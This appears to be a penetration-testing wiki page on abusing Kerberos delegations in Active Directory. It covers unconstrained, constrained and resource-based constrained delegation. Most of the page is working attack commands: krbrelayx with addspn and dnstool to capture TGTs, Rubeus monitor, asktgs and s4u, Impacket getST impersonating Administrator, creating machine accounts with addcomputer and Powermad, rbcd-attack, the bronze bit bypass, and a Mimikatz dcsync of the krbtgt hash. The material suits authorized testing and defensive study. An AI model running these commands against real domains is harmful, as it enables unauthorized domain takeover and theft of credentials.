Delegations

Theory
There are three types of Kerberos delegations
Unconstrained delegations (KUD): a service can impersonate users on any other service.
Constrained delegations (KCD): a service can impersonate users on a set of services
Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service
With constrained and unconstrained delegations, the delegation attributes are set on the impersonating service whereas with RBCD, these attributes are set on the final resource or computer account itself.
Kerberos delegations can be abused by attackers to obtain valuable assets and sometimes even domain admin privileges.
Practice
Some of the following parts allow to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.
Unconstrained Delegations
If a computer, with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive a TGS containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user.
Unconstrained delegation abuses are usually combined with the PrinterBug or PrivExchange to gain domain admin privileges.
From the attacker machine (UNIX-like)
From the compromised computer (Windows)
From the attacker machine (UNIX-like)
In order to abuse the unconstrained delegations privileges of a computer account, an attacker must add his machine to the SPNs of the compromised account and add a DNS entry for it.
This allows targets (like Domain Controllers and Exchange servers) to authenticate back to the attacker machine.
This can be done with addspn, dnstool and krbrelayx (Python).
# Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)
addspn.py -u 'DOMAIN\MachineAccont$' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'
​
# Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs
dnstool.py -u 'DOMAIN\MachineAccont$' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'
​
# Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
krbrelayx.py -aesKey 'MachineAccount_AES_key'
Once the krbrelayx listener is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. The listener will then receive an authentication, hence a TGS, containing a TGT.
From the compromised computer (Windows)
Once the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the TGS to show up and to extract the TGT it contains.
Rubeus.exe monitor /interval:5
Once the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a TGS, containing a TGT). The TGT can be used to request a TGS for another service.
Rubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt
Once the ticket is injected, it can natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash.
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Constrained Delegations
If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin) in the environment to access the second service.
If the service is configured with constrained delegation without protocol transition, then it works similarly to unconstrained delegation. The attacker controlled service needs to receive a user's TGS in order to  use the embedded TGT as an identity proof. "Without protocol transition" means the Kerberos authentication protocol needs to be used all the way.
If the service is configured with constrained delegation with protocol transition then it doesn't need that user's TGS. It can obtain it with a S4U2Self request and then use it with a S4U2Proxy request. The identity proof can either be a password, an NT hash or an AES key.
Once the final "impersonating" ticket is obtained, it can be used with Pass-the-Ticket to access the target service.
UNIX-like
Windows
UNIX-like
The Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" TGS (in this case, "Administrator" is impersonated/delegated account but it can be any user in the environment).
The input credentials are those of the compromised service account configured with constrained delegations.
# with an NT hash
getST.py -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account
​
# with an AES (128 or 256 bits) key
getST.py -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.
Windows
​Rubeus can be used to request the delegation TGT and the "impersonation TGS".
# Request the TGT
Rubeus.exe tgtdeleg
​
# Request the TGS and inject it for pass-the-ticket
Rubeus.exe s4u /ticket:$base64_extracted_TGT /impersonateuser:Administrator /domain:$DOMAIN /msdsspn:$Target_SPN /dc:$DomainController /ptt
Once the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).
Resource Based Constrained Delegations (RBCD)
If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.
Then, in order to abuse this, the attacker has to control the computer account the object's attribute has been populated with.
In this situation, an attacker can obtain admin access to the target resource (the object configured for RBCD in the first step).
Control a computer account (e.g. create a computer account by leveraging the MachineAccountQuota setting)
Populate the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor of another object with the controlled machine account as value, using the credentials of a domain user that has the capability to populate attributes on the target object (e.g. GenericWrite).
Using the computer account credentials, operate S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.
UNIX-like
Windows
UNIX-like
The Impacket script addcomputer (Python) can be used to create a computer account, using the credentials of a domain user (withms-DS-MachineAccountQuota > 0, by default it is set to 10).
addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass 'SomePassword' -dc-host $DomainController -domain-netbios $DOMAIN 'DOMAIN\anonymous:anonymous'
In some mysterious cases, using addcomputer.py to create a computer account resulted in the creation of a disabled computer account. Testers can use ntlmrelayx instead with the--add-computer option, like this​
The rbcd-attack script (Python) can be used to modify the delegation rights (populate the target's msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor), using the credentials of a domain user. The rbcd permissions script (Python) is an alternative to rbcd-attack that can also do pass-the-hash, pass-the-ticket, and operate cleanup of the security descriptor.
rbcd-attack -f 'SHUTDOWN' -t $Target -dc-ip $DomainController 'DOMAIN\anonymous:anonymous'
​
# Attack (example with user/password)
rbcd-permissions -c 'CN=SHUTDOWN,OU=Computers,DC=DOMAIN,DC=LOCAL' -t 'CN=TARGET,OU=Computers,DC=DOMAIN,DC=LOCAL' -d $DOMAIN_FQDN -u $USER -p $PASSWORD -l $LDAPSERVER
​
# Cleanup
rbcd-permissions --cleanup -c 'CN=SHUTDOWN,OU=Computers,DC=DOMAIN,DC=LOCAL' -t 'CN=TARGET,OU=Computers,DC=DOMAIN,DC=LOCAL' -d $DOMAIN_FQDN -u $USER -p $PASSWORD -l $LDAPSERVER
Testers can use ntlmrelayx to set the delegation rights with the --delegate-access option (see NTLM relay) instead of using rbcd-attack or rbcd-permissions​
Once the security descriptor has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final "impersonating" TGS (in this case, "Administrator" is impersonated but it can be any user in the environment).
getST.py -spn $target_SPN -impersonate Administrator -dc-ip $DomainController 'DOMAIN/SHUTDOWN$:SomePassword'
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.
Windows
The following command can be used to run network operations as a domain user (prompt for password)
runas /netonly /user:$DOMAIN\$USER powershell
Check the domain user we control can create a machine account (ms-DS-MachineAccountQuota > 0, by default it is set to 10).
Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'
​Powermad can be used to create a machine account.
Import-Module .\Powermad.ps1
$password = ConvertTo-SecureString 'SomePassword' -AsPlainText -Force
New-MachineAccount -machineaccount 'SHUTDOWN' -Password $($password)
The PowerShell Active Directory Module's cmdlets Set-ADComputer and Get-ADComputer can be used to write and read the attributed of an object (in this case, to modify the delegation rights).
# Populate the msDS-AllowedToActOnBehalfOfOtherIdentity
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'SHUTDOWN$'
​
# Check the populated attribute
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount
​Rubeus can then be used to request the "impersonation TGS" and inject it for later use.
Rubeus.exe s4u /user:SHUTDOWN$ /rc4:$computed_NThash /impersonateuser:Administrator /msdsspn:$Target_SPN /ptt
The NT hash can be computed as follows.
Import-Module .\DSInternals.ps1
ConvertTo-NTHash $password
Once the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).
References
“Relaying” Kerberos - Having fun with unconstrained delegation
There have been some interesting new developments recently to abuse Kerberos in Active Directory, and after my dive into Kerberos across trusts a few months ago, this post is about a relatively unknown (from attackers perspective), but dangerous feature: unconstrained Kerberos delegation. During the writing of this blog, this became quite a bit more relevant with the discovery of some interesting RPC calls that can get Domain Controllers to authenticate to you, which even allow for compromise across forest boundaries. Then there was the discovery of PrivExchange which can make Exchange authenticate in a similar way. Because tooling for unconstrained delegation abuse is quite scarce, I wrote a new toolkit, krbrelayx, which can abuse unconstrained delegation and get Ticket Granting Tickets (TGTs) from users connecting to your host. In this blog we will dive deeper into unconstrained delegation abuse and into some more advanced attacks that are possible with the krbrelayx toolkit.
dirkjanm.io
Unconstrained Delegation Permissions | Stealthbits Technologies
Discovering computers with Kerberos unconstrained delegation in Active Directory using PowerShell module cmdlet Get-ADComputer
blog.stealthbits.com
Constrained Delegation Abuse: Abusing Constrained Delegation to Achieve Elevated Access | Stealthbits Technologies
Discover how constrained delegation can be abused to get elevated access to a specific configured service in this blog post.
blog.stealthbits.com
Resource-Based Constrained Delegation Abuse | Abusing RBCD & MachineAccountQuota
This post will dive into the scenario where a user abuses the capability to create computer accounts in Active Directory & some poorly configured Active Directory permissions, to take over a target computer.
blog.stealthbits.com
Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
Back in March 2018, I embarked on an arguably pointless crusade to prove that the TrustedToAuthForDelegation attribute was meaningless, and that “protocol transition” can be achieved without it. I believed that security wise, once constrained delegation was enabled (msDS-AllowedToDelegateTo was not null), it did not matter whether it was configured to use “Kerberos only” or “any authentication protocol”.  I started the journey with Benjamin Delpy’s (@gentilkiwi) help modifying Kekeo to support a certain attack that involved invoking S4U2Proxy with a silver ticket without a PAC, and we had partial success, but the final TGS turned out to be unusable. Ever since then, I kept coming back to it, trying to solve the problem with different approaches but did not have much success. Until I finally accepted defeat, and ironically then the solution came up, along with several other interesting abuse cases and new attack techniques.
shenaniganslabs.io
CVE-2020-17049: Kerberos Bronze Bit Attack - Theory
This post is an overview of the theory of the Bronze Bit attack (CVE-2020-17049) against Kerberos implementations in Windows Active Directory.
blog.netspi.com
Kerberoast
Access Control Entries (ACEs)
Last updated 1 month ago